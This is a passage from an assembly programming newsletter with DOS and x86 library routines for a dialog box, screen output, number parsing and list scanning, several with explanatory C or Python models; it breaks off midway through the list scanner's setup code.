      mov ax,02               ;; Hide mouse cursor
      int 33h

      RET
Dialog_box ENDP              ;; End of procedure

END   ;; End of program
;;////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;;
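
The mouse handling in DLGBOX.ASM comes down to two steps: divide the
positions returned by INT 33h function 03h by 8 to get a text row and
column, then compare them with the row and column range of a button. Here
is a minimal sketch of that arithmetic in C. The constants are copied from
the DATASEG of the listing; the function names pixel_to_cell and
hits_button are made up for this illustration, and the 8-unit cell size
assumes text mode 3, as the program itself does.

```c
#include <stdbool.h>

/* Constants copied from the DATASEG of DLGBOX.ASM.
   Note that in the listing "x" means row and "y" means column. */
enum {
    BOX_HEIGHT = 10, BOX_WIDTH = 46,
    LEFT_X = 7, LEFT_Y = 20,               /* upper left corner (row, column) */
    RIGHT_X = LEFT_X + BOX_HEIGHT - 1,
    CHAR_COUNT = 7,                        /* yes_char_count == no_char_count */
    YES_X = RIGHT_X - 2,
    YES_Y = LEFT_Y + BOX_WIDTH / 2 - CHAR_COUNT - 4,
    NO_X  = RIGHT_X - 2,
    NO_Y  = LEFT_Y + BOX_WIDTH / 2 + 1
};

/* Hypothetical helper: one character cell spans 8 mouse units in mode 3. */
int pixel_to_cell(int pixel) { return pixel / 8; }

/* Hypothetical helper: true if the mouse position lies on the button that
   starts at (btn_row, btn_col) and is CHAR_COUNT cells wide. */
bool hits_button(int pixel_row, int pixel_col, int btn_row, int btn_col) {
    int row = pixel_to_cell(pixel_row);
    int col = pixel_to_cell(pixel_col);
    return row == btn_row && col >= btn_col && col <= btn_col + CHAR_COUNT - 1;
}
```

With these constants the YES button occupies row 14, columns 32 to 38, and
the NO button row 14, columns 44 to 50, which matches the ;;32 and ;;44
remarks in the listing.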

Now we have written a superb, user-friendly program. If you want to embed the
above examples in your own work you may have to change these programs heavily,
but the basic principles will be the same.
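
One of those principles is the way the keyboard is decoded in DLGBOX.ASM:
an ordinary key arrives as one byte, an extended key as a zero byte
followed by its scan code. The C sketch below replays that decision logic
on a buffer of bytes such as INT 21h function 08h would deliver them. The
function name run_dialog and the idea of feeding it an array are
assumptions made for this illustration; the key values are the ones from
the listing.

```c
#include <stddef.h>

enum { TAB_KEY = 9, ENTER_KEY = 13, LEFT_ARROW = 75, RIGHT_ARROW = 77 };

/* Hypothetical model of the key_check section. Returns the selected
   button ('y' or 'n') when ENTER arrives, or 0 if the input runs out. */
char run_dialog(const unsigned char *keys, size_t n) {
    char button = 'y';                        /* YES is selected at start */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = keys[i];
        if (c == ENTER_KEY)
            return button;
        if (c == 0) {                         /* extended key: read again */
            if (++i >= n)
                break;
            c = keys[i];                      /* this byte is a scan code */
            if (c != LEFT_ARROW && c != RIGHT_ARROW)
                continue;
        } else if (c != TAB_KEY) {
            continue;                         /* every other key is ignored */
        }
        button = (button == 'y') ? 'n' : 'y'; /* toggle the selection */
    }
    return 0;
}
```

Note that a plain 'K' (ASCII 75) does not toggle the selection, although
75 is also the scan code of LEFT ARROW: only the byte that follows a zero
is treated as a scan code.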

    Please e-mail me your comments and suggestions at ssirajudeen@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                         ASM Building Blocks
                                                         by Laura Fairhead


     Here are some simple but very powerful library routines, primarily
concerned with screen output. They all follow the same conventions:
   *  Routines preserve all registers that they are not specified to return.
   *  The direction flag (DF) should always be clear before calling.

     All code is presented in MASM format. I do not use very many of the
functions of this assembler, so it should be trivial to assemble these under
a different one. I do, however, use OPTION SCOPED; this means that labels
within a PROC block are local to that PROC block (a label suffixed with a
double colon is given global scope, though).

     First come the primitive routines. These are responsible for the actual
output and simply call DOS to do it. This sort of thing is called a 'wrapper'
function: it does nothing in itself except provide a particular interface to
the application. If all your access to the OS goes through a small number of
logical wrapper functions then porting your code to other systems becomes a
lot easier.

;pstrcx-    write CX characters to stdout
;           uses DOS function 040h
;
;entry:     DS:SI=string address
;           CX=length of string
;
;exit:      (no parameters are returned)

pstrcx  PROC NEAR

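;never hand DOS a zero-byte write: on a file handle, function 040h with CX=0
;truncates the file at the current position, which would bite if stdout
;were redirected to a file (I don't trust those M$ programmers)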
         JCXZ don
         PUSH AX
         PUSH BX
         MOV AH,040h
         MOV BX,1            ;stdout is handle #1
         XCHG DX,SI
         INT 021h
         XCHG DX,SI
         POP BX
         POP AX
don:    RET

pstrcx  ENDP

     Note the use of XCHG. XCHG is an extremely useful instruction indeed,
even though there are those who wish to see its death along with all those
other "horrible, odd-ball, x86 specific" instructions. XCHG in essence
performs two operations simultaneously, which is hideously useful considering
that they are both MOVs. Also, if one of the registers is AX (or EAX in
32-bit code) you get a lovely 1 byte instruction as a bonus.

     XCHG is in fact the real instruction hiding behind the pseudo-op NOP.
If you look at the opcode for a NOP, it is 090h; this is actually the
encoding for XCHG AX,AX, which, since it has no effect on the machine state
whatsoever (except of course IP+=1), is ideally suited for this.

     I haven't looked back since adding putch to my library. I used to use
the sequence:-

     MOV DL,<char>
     MOV AH,2
     INT 021h

     Not only is the putch method much cleaner and more flexible, it also
saves bytes! Of course the price is that this method adds clocks. However,
if you think about it the wasted clocks are really meaningless. Sending
characters one at a time to stdout is rather like spelling out a dictation
to your secretary letter-by-letter. In a case where you want more MIPS you
should be looking at your higher level algorithm and not the output routine;
an INT takes a vast amount of time anyway...

;putch-     write single character to stdout
;           uses DOS function 02h
;
;entry:     AL=character to write
;
;exit:      (no parameters are returned)

putch   PROC NEAR

         PUSH DX
         XCHG DX,AX
         MOV AH,2
         INT 021h
         XCHG DX,AX
         POP DX
         RET

putch   ENDP


     This strlen is not hot on speed; it was written to be compact. You can,
if you wish, write MUCH faster code than this. I believe X-Bios2 presented
something along these lines in a previous APJ. However, the most important
thing here is certainly not speed, and if you wanted speed in string
handling so badly you should really not use asciiz at all; it was never
designed for that.

;strlen-    return length of asciiz string
;
;entry:     DS:SI=address of asciiz string
;
;exit:      CX=length of string

strlen  PROC NEAR

         PUSH AX
         XOR CX,CX
         DEC CX

lop:    INC CX
         LODSB
         CMP AL,1
         JNC lop

         SBB SI,CX
         POP AX
         RET

strlen  ENDP
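
     The routine is compact because CMP AL,1 sets the carry flag only when
AL is zero, and that same carry is then reused by SBB to undo the one extra
byte that LODSB stepped over. The C model below traces the register values
step by step. It is only a sketch for following the logic: the variable
names mirror the registers, and the function name strlen_model is made up
for this illustration.

```c
#include <stddef.h>

/* Register-level model of strlen PROC. Stores the length (CX) in *cx_out
   and returns the final value of SI. */
const char *strlen_model(const char *si, size_t *cx_out) {
    size_t cx = (size_t)-1;          /* XOR CX,CX / DEC CX                */
    unsigned char al;
    int cf;
    do {
        cx++;                        /* INC CX                            */
        al = (unsigned char)*si++;   /* LODSB (DF clear, so SI moves up)  */
        cf = (al < 1);               /* CMP AL,1: CF=1 only when AL == 0  */
    } while (!cf);                   /* JNC lop                           */
    si -= cx + (size_t)cf;           /* SBB SI,CX: SI = SI - CX - CF      */
    *cx_out = cx;
    return si;                       /* SI is back at the string start    */
}
```

At loop exit SI points one past the terminating zero, that is, at
start+length+1, and CF is 1, so the single SBB restores SI exactly. This is
why strlen can honour the "preserve all registers" convention without a
PUSH SI / POP SI pair.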

     Now, already, we start getting serious payback for being so good.
The code virtually writes itself.....

;pstr-      write asciiz string to stdout
;
;entry:     DS:SI=address of asciiz string
;
;exit:      (no parameters are returned)

pstr    PROC NEAR

         PUSH CX
         CALL NEAR PTR strlen
         CALL NEAR PTR pstrcx
         POP CX
         RET

pstr    ENDP

;pstrcr-    write asciiz string to stdout with appended newline
;
;entry:     DS:SI=address of asciiz string
;
;exit:      (no parameters are returned)

pstrcr  PROC NEAR

         CALL NEAR PTR pstr
         JMP NEAR PTR outcr

pstrcr  ENDP


;outcr-     write newline to stdout
;
;entry:     (no entry parameters)
;
;exit:      (no parameters are returned)

outcr   PROC NEAR

         PUSH AX
         MOV AL,0Dh
         CALL NEAR PTR putch
         MOV AL,0Ah
         CALL NEAR PTR putch
         POP AX
         RET

outcr   ENDP


;pchn-      write repeated character to stdout
;
;entry:     AL=character
;           CX=repetitions  (0 is valid and does nothing)
;
;exit:      (no parameters are returned)

pchn    PROC NEAR

         JCXZ don
         PUSH CX
lop:    CALL NEAR PTR putch
         LOOP lop
         POP CX
don:    RET

pchn    ENDP


;pstrlcl-   output string DS:SI left justified in a field
;           of CL spaces
;
;           if the field width is smaller than the string length
;           then the string is simply output
;
;entry:     DS:SI=asciiz string
;           CL=field width
;
;exit:      (all registers preserved)

pstrlcl PROC NEAR

         PUSH AX
         PUSH CX
         CALL NEAR PTR pstr
         MOV CH,0
         XCHG CX,AX
         CALL NEAR PTR strlen
         SUB AX,CX
         JNA SHORT don
         XCHG CX,AX
         MOV AL,020h
         CALL NEAR PTR pchn
don:    POP CX
         POP AX
         RET

pstrlcl ENDP

     Note the use of JNA. If you look at the logic for the JNA branch
(not many people seem to do this) you find that it branches iff
CF=1 OR ZF=1. Hence, after the SUB, it branches if the result is <=0,
that is, if the field width is not greater than the string length.
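
     For those who prefer to see the flag logic spelled out, here is a
small C model of SUB AX,CX followed by JNA, and of the padding count that
pstrlcl derives from it. The function names are made up for this sketch;
the arithmetic is 16-bit and unsigned, as in the routine.

```c
#include <stdbool.h>
#include <stdint.h>

/* Models the flags left by the 16-bit SUB AX,CX and the JNA decision. */
bool jna_taken_after_sub(uint16_t ax, uint16_t cx) {
    bool cf = ax < cx;                    /* borrow: AX below CX          */
    bool zf = (uint16_t)(ax - cx) == 0;   /* result is zero: AX equals CX */
    return cf || zf;                      /* JNA: jump if CF=1 or ZF=1    */
}

/* Number of spaces pstrlcl writes after the string (0 if JNA is taken). */
uint16_t pad_count(uint8_t width, uint16_t length) {
    if (jna_taken_after_sub(width, length))
        return 0;
    return (uint16_t)(width - length);
}
```

So a 3 character string in a field of 10 gets 7 spaces, while a string
that is as long as the field or longer gets none.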

     You may notice that all the routine names are <= 8 chars. The reason
is that you can save each one as a separate file, giving it the name of the
routine. This allows easy reference but has a drawback or two:

     (i) you have to remember the dependencies when you INCLUDE them
    (ii) you end up with a LOT of files

     So far I haven't found either of these 'drawbacks' to be a serious
problem.

     I will be referring back to these routines a lot in future articles;
whenever routines are required I will state it, and the code shall have a
list of INCLUDEs for the routines to be included. In this manner it will be
possible to present quite non-trivial programs within a reasonable amount
of space.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                               Converting Strings to Numbers
                                               by Chris Dragan


    Many programs require user input, which is often numbers. For this purpose
there are library functions, for example sscanf() in C. But in assembly
everything has to be done by hand, even under Windows (with the exception of
edit controls - the GetDlgItemInt() function).

    My last project required a flexible function for reading numbers stored as
strings. Out of this project came a function which handles most of the common
number formats.

    The function expects the esi register to point at a zero-terminated string
which holds a number. The string can have one of the following forms:

      10        decimal integer
      10D       decimal integer
      1010B     binary integer
      AH        hexadecimal integer (does not require leading zero)
      0XA       hexadecimal integer
      $A        hexadecimal integer
      12Q       octal integer
      12O       octal integer
      10F       float
      10.0      float
      10.0F     float
      1.0E+1F   float
      1.E+1     float

    The string is required to have all letters (hex digits, number type
specifiers) uppercase. If a number is to contain lowercase letters, it has
to be converted before calling the function.
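
    The format is identified from the prefix and the last character alone,
before any digit is looked at. As a rough sketch of that decision order
(C-style prefix, Pascal-style prefix, suffix letter, decimal point), here
is the same logic in C. The enum and the name classify_number are made up
for this illustration; the digits themselves would still be validated by
the conversion that follows.

```c
#include <stddef.h>
#include <string.h>

typedef enum {
    FMT_INVALID, FMT_DECIMAL, FMT_HEX, FMT_BINARY, FMT_OCTAL, FMT_FLOAT
} NumFormat;

/* Hypothetical helper: decides the number format of an uppercase string. */
NumFormat classify_number(const char *s) {
    size_t len = strlen(s);
    if (len == 0)
        return FMT_INVALID;
    if (s[1] == 'X')                      /* C style: must be "0X..."     */
        return s[0] == '0' ? FMT_HEX : FMT_INVALID;
    if (s[0] == '$')                      /* Pascal style                 */
        return FMT_HEX;
    switch (s[len - 1]) {                 /* type specifier at the end    */
        case 'H': return FMT_HEX;
        case 'B': return FMT_BINARY;
        case 'D': return FMT_DECIMAL;
        case 'Q':
        case 'O': return FMT_OCTAL;
        case 'F': return FMT_FLOAT;
        default:  break;
    }
    /* No specifier: a decimal point makes it a float. */
    return strchr(s, '.') != NULL ? FMT_FLOAT : FMT_DECIMAL;
}
```

The order matters: because the suffix is tested before the content, a
string ending in B or D without a hex prefix or an H suffix is taken as
binary or decimal, never as a hexadecimal number.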

    The function returns the number type in eax:
      - 0 if the number is invalid,
      - 1 if the number is a dword integer,
      - 2 if the number is a qword integer and
      - 3 if the number is a float.
The number is returned in edx (dword), ecx:edx (qword) or st(0) (float).
The number will be a qword integer if it exceeds 0xFFFFFFFF.
Also notice that the number is assumed to be positive; a '-' before the
number is not accepted and has to be handled externally.
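
    To make the integer return convention concrete, here is a minimal C
sketch of a decimal conversion that reports the same type codes: 0 for an
invalid string or one that does not fit in 64 bits, 1 for a value that fits
in a dword and 2 for a qword. The name parse_decimal and the single 64-bit
accumulator are assumptions of this sketch; the assembly works with a pair
of 32-bit registers instead.

```c
#include <stdint.h>

/* Hypothetical helper. Returns 0 (invalid), 1 (dword) or 2 (qword) and
   stores the value in *value when the result is not 0. */
int parse_decimal(const char *s, uint64_t *value) {
    uint64_t v = 0;
    if (*s == '\0')
        return 0;                               /* empty string            */
    for (; *s != '\0'; s++) {
        unsigned d = (unsigned)((unsigned char)*s - '0');
        if (d > 9)
            return 0;                           /* not a decimal digit     */
        if (v > (UINT64_MAX - d) / 10)
            return 0;                           /* would exceed 64 bits    */
        v = v * 10 + d;
    }
    *value = v;
    return v > 0xFFFFFFFFu ? 2 : 1;
}
```

For example "4294967295" gives type 1, while "4294967296" is one too large
for a dword and gives type 2.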

    Floating point conversion is done using multiplication, not by means
of the fbld instruction. This is because fbld limits numbers to 18 decimal
digits, but the function can accept longer numbers as long as they are not
too large or too small.
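
    The idea of converting by multiplication can be sketched in C as
follows: every digit multiplies the running value by ten and is added to
it, so there is no fixed limit on the number of digits. This is only an
illustration of the principle, not a transcription of the routine; the name
parse_plain_float is made up, and exponents and the trailing 'F' are left
out to keep it short.

```c
#include <stdbool.h>

/* Hypothetical helper: parses digits[.digits] into *out.
   Returns false if the string contains anything else or has no digit. */
bool parse_plain_float(const char *s, long double *out) {
    long double value = 0.0L;   /* all digits accumulated as one integer */
    long double scale = 1.0L;   /* 10^(number of digits after the point) */
    bool seen_point = false;
    bool seen_digit = false;

    for (; *s != '\0'; s++) {
        if (*s == '.' && !seen_point) {
            seen_point = true;
            continue;
        }
        if (*s < '0' || *s > '9')
            return false;
        value = value * 10.0L + (long double)(*s - '0');
        if (seen_point)
            scale *= 10.0L;
        seen_digit = true;
    }
    if (!seen_digit)
        return false;
    *out = value / scale;
    return true;
}
```

A 25 digit string is accepted without any special handling; it merely
loses the digits that do not fit into the mantissa.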

    And here is the function. It was written (and tested) in TASM's ideal
mode, but it can be easily ported to MASM or NASM. The function preserves all
registers but eax, ecx and edx, which are used for the return value. Note
that it overwrites a trailing type specifier (H, B, D, Q, O or F) in the
string with a zero.

; This helper macro checks if there was an error on the fpu

macro     chkfpu _endinglabel
                fxam
                fstsw     ax
                sahf
                jc   _endinglabel
endm

proc ConvertNumber uses edi

;---------------- Identify number format

           ; Search for 0 at the end
                mov  edi, esi
                or   ecx, -1
                xor  eax, eax
                cld
             repne scasb

           ; Move to the last character
                dec  edi
                dec  edi

           ; Is there anything ?
                cmp  esi, edi
                ja   __invalid

           ; Identify C-style and Pascal-style hexadecimals
                cmp  [byte esi+1], 'X'
                je   __c_hex
                cmp  [byte esi], '$'
                je   __pas_hex

           ; Identify other types using the last character
                movzx     eax, [byte edi]
                cmp  eax, 'H'
                je   __asm_hex
                cmp  eax, 'B'
                je   __binary
                cmp  eax, 'D'
                je   __decimal
                cmp  eax, 'Q'
                je   __octal
                cmp  eax, 'O'
                je   __octal
                cmp  eax, 'F'
                je   __float_clr

           ; Find a decimal point (distinguish between integer and float)
                not  ecx
                dec  ecx
                mov  eax, '.'
                mov  edi, esi
             repne scasb
                je   __float

;---------------- Process decimal integer

           ; Prepare
__decimal:          mov  [byte edi], 0
                mov  edi, esi
                xor  eax, eax

           ; Get a digit
__next_decimal:     movzx     ecx, [byte edi]
                inc  edi
                xor  edx, edx

           ; Zero ends the string
                test ecx, ecx
                jz   __finito

           ; Multiply the already loaded part by ten
                add  edx, 10
                mul  edx

           ; If an overflow occurs - the number is a quadword
                jo   __decimal_qword

           ; Check digit validity
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit
                add  eax, ecx

           ; Next digit or process a quadword if carry occurs
                jnc  __next_decimal
                jmp  __decimal_carry

;---------------- Decimal (appears to be greater than 0FFFF_FFFFh)

           ; Check digit validity
__decimal_qword:    sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit (qword addition)
                add  eax, ecx
__decimal_carry:    adc  edx, 0

           ; Load next digit
                movzx     ecx, [byte edi]
                inc  edi

           ; Check for ending zero
                test ecx, ecx
                jz   __finito

           ; Multiply high part by 10
                push eax
                mov  eax, edx
                mov  edx, 10
                mul  edx

           ; Number too large if an overflow occurs
                jo   __decimal_overflow

           ; Multiply low part by 10
                xchg eax, [esp]
                mov  edx, 10
                mul  edx

           ; Join high parts
                add  edx, [esp]

           ; Number too large if carry
                jc   __decimal_overflow

           ; Next digit
                add  esp, 4
                jmp  __decimal_qword

           ; Handle overflow
__decimal_overflow: pop  eax
                jmp  __invalid

;---------------- Process hexadecimal integer

           ; Was Pascal-style hex (leading '$')
__pas_hex:          lea  edi, [esi+1]
                jmp  __hex

           ; Was C-style hex (leading '0X')
__c_hex:       cmp  [byte esi], '0'
                jne  __invalid
                lea  edi, [esi+2]
                jmp  __hex

           ; Was asm-style hex (ending with 'H')
__asm_hex:          mov  [byte edi], 0
                mov  edi, esi

           ; Clear what will become the number
__hex:              xor  eax, eax
                xor  edx, edx

           ; Get a digit
__get_hex:          movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __finito

           ; Number too large if the most significant nibble of edx
           ; is nonzero
                cmp  edx, 0FFFFFFFh
                ja   __invalid

           ; Multiply the already converted part by 16
                shld edx, eax, 4
                add  eax, eax ; to avoid shift (see lea below)

           ; Convert ASCII to digit
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                jna  __hex_ok
                sub  ecx, 7
                cmp  ecx, 9
                jna  __invalid
                cmp  ecx, 15
                ja   __invalid

           ; Add the digit
__hex_ok:      lea  eax, [eax*8+ecx]
                jmp  __get_hex

;---------------- Return integer

__finito:      mov  ecx, edx
                mov  edx, eax
                cmp  ecx, 1
                sbb  eax, eax
                add  eax, 2
                ret

;---------------- Process binary integer

           ; Prepare
__binary:      mov  [byte edi], 0
                xor  eax, eax
                xor  edx, edx
                mov  edi, esi

           ; Get a digit
__get_binary:       movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __finito

           ; Shift everything left and add the digit
                shr  ecx, 1
                adc  eax, eax
                adc  edx, edx
                jc   __invalid

           ; Check digit validity and get next digit if OK
                cmp  ecx, '0' shr 1
                jne  __invalid
                jmp  __get_binary

;---------------- Process octal integer

           ; Prepare
__octal:       mov  [byte edi], 0
                xor  eax, eax
                xor  edx, edx
                mov  edi, esi

           ; Get a digit
__get_octal:        movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __finito

           ; Check if there is room for another digit
                cmp  edx, 1FFFFFFFh
                ja   __invalid

           ; Multiply the already converted part by 8
                shld edx, eax, 3

           ; Convert ASCII to number
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 7
                ja   __invalid

           ; Add the digit
                lea  eax, [eax*8+ecx]
                jmp  __get_octal

;---------------- Invalid number

__invalid:          fninit
                xor  eax, eax
                ret

;---------------- Process integer part of a float

           ; Prepare (st0=0, st1=10)
__float_clr:        mov  [byte edi], 0
__float:       finit
                push 0300h ; mask off all interrupts
                fldcw     [word esp]
                push 10
                fild [dword esp]
                add  esp, 8
                fldz
                mov  edi, esi

           ; Get a digit
__get_integer:      movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __float_ready

           ; Decimal point starts fraction part
                cmp  ecx, '.'
                je   __float_fraction

           ; Multiply the already converted part by 10
                fmul st, st(1)
                chkfpu    __invalid

           ; Convert ASCII to number
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit
                push ecx
                fiadd     [dword esp]
                add  esp, 4
                chkfpu    __invalid
                jmp  __get_integer

;---------------- Process fractional part of a float

           ; Prepare (st0=0, st1=1, st2=num, st3=10)
__float_fraction:   fld1
                fldz

           ; Get a digit
__get_fraction:     movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __fraction_ready

           ; E starts exponent
                cmp  ecx, 'E'
                je   __fraction_ready

           ; Multiply the already converted part by 10
                fmul st, st(3)

           ; Multiply the divisor by 10
                fxch st(1)
                fmul st, st(3)
                fxch st(1)
                chkfpu    __invalid
                fxch st(1)
                chkfpu    __invalid
                fxch st(1)

           ; Convert ASCII to number
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit
                push ecx
                fiadd     [dword esp]
                add  esp, 4
                chkfpu    __invalid
                jmp  __get_fraction

;---------------- Process exponent part of a float

           ; Divide the fraction by the divisor
__fraction_ready:   fdivrp    st(1), st

           ; Add fraction to integer
                faddp     st(1), st

           ; E indicates start of exponent
                cmp  ecx, 'E'
                jne  __float_ready

           ; Prepare (st0=0, st1=num, st2=10)
                fldz

           ; Sign of the exponent
                xor  edx, edx
                cmp  [byte edi], '-'
                jne  __no_minus
                not  edx
                inc  edi
__no_minus:         cmp  [byte edi], '+'
                jne  __get_exponent
                inc  edi

           ; Get a digit
__get_exponent:     movzx     ecx, [byte edi]
                inc  edi

           ; Zero ends the string
                test ecx, ecx
                jz   __exponent_ready

           ; Multiply the already converted part by 10
                fmul st, st(2)
                chkfpu    __invalid

           ; Convert ASCII to number
                sub  ecx, '0'
                jc   __invalid
                cmp  ecx, 9
                ja   __invalid

           ; Add the digit
                push ecx
                fiadd     [dword esp]
                add  esp, 4
                chkfpu    __invalid
                jmp  __get_exponent

           ; Multiply by 10**exp (** is a power operation)
__exponent_ready:   test edx, edx
                jz   __positive_exp
                fchs
__positive_exp:     fldl2t              ; --+ 10**x = 2**(x*log2(10))
                fmulp     st(1), st ;   |
                fld  st             ;   |
                frndint             ;   |
                fsub st(1), st      ;   |
                fld1                ;   |
                fscale              ;   |
                fstp st(1)          ;   |
                fxch st(1)          ;   |
                f2xm1               ;   |
                fld1                ;   |
                faddp     st(1), st ;   |
                fmulp     st(1), st ; --+
                fmulp     st(1), st

           ; Return float
__float_ready:      chkfpu    __invalid
                fstp st(1)
                mov  eax, 3
                ret
endp



And that is it. The function is not meant to work as fast as possible and
was not optimized, but it does the task it has to do.
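
For readers who want to check the arithmetic of the exponent step, here is
a rough Python model of the FPU sequence annotated 10**x = 2**(x*log2(10))
in the listing above. It is only a sketch: the name pow10 is made up for
illustration, Python doubles stand in for the FPU registers, and round()
and math.ldexp() stand in for FRNDINT and FSCALE.

```python
import math

def pow10(x):
    """Model of the FLDL2T ... FMULP sequence: 10**x via 2**(x*log2(10))."""
    y = x * math.log2(10)            # fldl2t / fmulp
    whole = round(y)                 # frndint (round to nearest)
    frac = y - whole                 # fsub: |frac| <= 0.5, small enough for f2xm1
    scale = math.ldexp(1.0, whole)   # fld1 / fscale: 1 * 2**whole
    return scale * (2.0 ** frac)     # f2xm1 plus 1, then fmulp
```

The split into a whole part and a fraction is there because F2XM1 only
accepts a small argument, so the whole part has to go through FSCALE.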














::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                       List Scan Library Routine
                                                       by Laura Fairhead


     First, let me introduce an auxiliary routine that this one uses. It is
called 'scaws' and scans past whitespace. It is very simple, and the
definition of whitespace here is SPACE (020h) or TAB (09h):-

========START OF CODE======================================================

;
;scaws-     scan whitespace
;
;entry:     DS:SI=string
;           DF=0
;
;exit:      SI=updated to first non-whitespace character
;           AL=value of the character
;

scaws   PROC NEAR

;
;there is nothing to explain here but you might take note now
;that I always use the same label names in different PROC blocks,
;in MASM you can do this with OPTION SCOPED
;

lop:    LODSB
         CMP AL,020h
         JZ lop
         CMP AL,09h
         JZ lop
         DEC SI
         RET

scaws   ENDP


========END OF CODE========================================================

     'scalst' is basically a routine to scan-convert a list which can
consist of values and strings. The radix of the values must be set
beforehand by calling 'scanur', as the routine uses 'scanu' to convert
values and doesn't set the radix itself. The syntax of the list is
almost the same as the list in DEBUG, which is in fact where I got the
idea from. You have zero or more data items, optionally separated by
commas. Whitespace can be used freely as a delimiter, and no delimiters
are necessary where there is no need for them (eg: between a value and a
string).

     The routine takes several parameters: the address of your string
(DS:SI), the address of somewhere to store the converted data (ES:DI),
the size of the data store (CX) and the size of a unit (AL). The unit size
can be byte (AL=1), word (AL=2) or dword (AL=4).

     Each data item (a value, or a single character of a string) is
zero-padded to the unit size for storing. Values are also checked to be
in range for the unit size. This method therefore allows us to have those
silly word strings.

     Here are some examples, all of these assume that we had set the
radix = 010h (by calling 'scanur' with AL=010h) :-

     Calling with AL=1, and our string=1 2 3 "ABC" yields:-

     01 02 03 41 42 43

     Calling with AL=4, and our string="0"1FE08 2 yields:-

     30 00 00 00 08 FE 01 00 02 00 00 00

     Calling with AL=2, and our string=9A06 87"DEF" yields:-

     06 9A 87 00 44 00 45 00 46 00

     Calling with AL=2, and our string="ABC"FE0FE 0 1 2 yields:-

     ERROR! CF=1        (FE0FE>FFFF)

     A particularly powerful feature of this routine is that it takes
a parameter giving the size of your data store (in bytes). This means
that it will be impossible for the program to be crashed because there
was too much data. Programmers are generally too lazy to do this sort of
range checking, much to their woe, as one particularly wily hacker
attack called 'smashing the stack' has taught.

     Example; if we called with AL=2, CX=4 and string=1 9 F

     ERROR! CF=1        (01 00 09 00 0F 00 > 4bytes)

     As an aside, the function is not entirely the same as DEBUG's list
scanner. With DEBUG the strings are always converted to byte lists, no
matter what the unit size is. It is trivial to modify the routine to
work in this way.

     One last note is that the end of the list is the first invalid
character in the string. This is not an error, of course, since it is
the responsibility of the controlling parser to decide this based on the
context; eg: DEBUG might check for a semicolon comment on the end of
the line, though as a matter of fact it doesn't. A premature ending (ie:
0 byte appearing inside the quotes of a string token) will abort with
error, thus;

     AL=1, string=0A 98"unterminated string  yields:-

     ERROR! CF=1         (unterminated string)
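
To make the rules above easier to experiment with, here is a small Python
model of the behaviour just described. It is a sketch, not a translation
of the routine: the name scan_list and its return value are made up for
illustration, 'scanu' is not shown in this article so its behaviour is
assumed (a run of digits in the current radix, upper or lower case), and
the text is assumed to be plain ASCII.

```python
def scan_list(text, unit, store_size, radix=16):
    """Return (ok, data, pos); ok is False where the routine would set CF=1."""
    digits = "0123456789ABCDEF"[:radix]
    limit = (1 << (8 * unit)) - 1      # largest value that fits in one unit
    out = bytearray()
    pos = 0

    def skip_ws(p):                    # plays the role of 'scaws'
        while p < len(text) and text[p] in " \t":
            p += 1
        return p

    def write(value):                  # plays the role of 'wracc'
        if len(out) + unit > store_size:
            return False               # not enough room left in the store
        out.extend(value.to_bytes(unit, "little"))
        return True

    first = True
    while True:
        pos = skip_ws(pos)
        if not first and pos < len(text) and text[pos] == ",":
            pos = skip_ws(pos + 1)     # optional comma between items
        first = False

        start = pos                    # try a value token first
        while pos < len(text) and text[pos].upper() in digits:
            pos += 1
        if pos > start:
            value = int(text[start:pos], radix)
            if value > limit or not write(value):
                return False, bytes(out), pos
            continue

        if pos >= len(text) or text[pos] != '"':
            return True, bytes(out), pos    # first invalid character ends the list

        pos += 1                       # string token: copy up to the closing quote
        while True:
            if pos >= len(text):
                return False, bytes(out), pos   # unterminated string
            ch = text[pos]
            pos += 1
            if ch == '"':
                break
            if not write(ord(ch)):
                return False, bytes(out), pos
```

Calling scan_list('9A06 87"DEF"', 2, 64) gives ok=True and the bytes
06 9A 87 00 44 00 45 00 46 00, as in the third example above, while
scan_list('1 9 F', 2, 4) reports an error because the store is too small.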


========START OF CODE======================================================

;
;scalst-    data list scan/convert routine
;
;entry:     DS:SI=string
;           ES:DI=store
;           CX=#bytes size of store
;           AL=unit size (1=byte,2=word,4=dword)
;           DF=0
;
;           "scanur" must have been called at least once previously
;           in order to set the radix of scanned values
;
;        !! entry parameters are not validated and invalid entry
;        !! parameters will cause undefined behaviour
;
;exit:      CF=1=>error (parse/overflow)
;           CF=0=>okay, then:
;               ZF=1=>no data scanned, ie: CX=0
;               ZF=0=>data scanned
;           SI=updated to the first invalid character
;           DI=updated to the end of converted data + 1
;           CX=#bytes converted data (invalid on overflow error)
;
;note:      requires routines "scaws" and "scanu"
;

scalst  PROC NEAR

;
;initialise stack frame
;[BP-4] (dw) size mask
;            =000000FFh for unit size 1
;            =0000FFFFh for unit size 2
;            =FFFFFFFFh for unit size 4
;[BP-6] (w)  unit size
;[BP-8] (w)  original data offset DI
;
;EAX is preserved and the main loop is entered
;
         ENTER 8,0
         PUSH EAX
         CBW
         MOV [BP-6],AX
         NEG AL
         AND AL,3
         SHL AL,3
         PUSH CX
         XCHG CX,AX
         OR EAX,-1
         SHR EAX,CL
         POP CX
         MOV [BP-4],EAX
